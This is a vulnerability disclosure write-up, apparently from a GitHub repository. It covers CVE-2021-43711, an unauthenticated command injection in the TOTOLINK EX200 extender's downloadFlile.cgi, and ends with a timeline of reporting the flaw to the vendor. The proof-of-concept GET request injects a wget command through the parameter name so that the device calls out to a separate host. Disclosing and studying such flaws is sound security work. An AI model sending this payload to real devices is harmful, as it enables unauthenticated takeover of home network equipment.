Headline
CVE-2021-43711: ToTolink_EX200_Cmmand_Execute/ToTolink EX200 Comand Injection2.md at main · doudoudedi/ToTolink_EX200_Cmmand_Execute
The downloadFlile.cgi binary file in TOTOLINK EX200 V4.0.3c.7646_B20201211 has a command injection vulnerability when receiving GET parameters. The parameter name can be constructed for unauthenticated command execution.
Permalink
Cannot retrieve contributors at this time
ToTolink EX200 Comand Injection****Venda && Firmware_link
ToTolink EX200 http://totolink.net/home/menu/detail/menu_listtpl/download/id/144/ids/36.html
link :http://totolink.net/data/upload/20210428/7979e841521515eb83b45aacf5b67f9a.zip
Firmware_link :V4.0.3c.7646_B20201211
Describe
The downloadFlile.cgi binary file has a command injection vulnerability when receiving GET parameters. The parameter name can be constructed for unauthenticated command execution
In the downloadFile cgi program, the QUERY_STRING environment parameter variable is the content of the GET request, so the parameter name can be controlled for command injection
POC
GET /cgi-bin/downloadFlile.cgi?;wget${IFS}http://192.168.0.111:801/mm.txt;=hahah HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
TEXT
Listen to port 801 locally, and the browser accesses the following URL
can see that the wireless extender has successfully connected to the local port 801
Reporting process****2021.10.20 found this vuln****2021.10.22 apply for vender****2021.11.03 fix vuln
The manufacturer’s email indicates that the vulnerability has been fixed, but maybe can’t issue an announcement
2021.11.11 public this vuln****CNVD-2021-85251
https://www.cnvd.org.cn/flaw/show/CNVD-2021-85251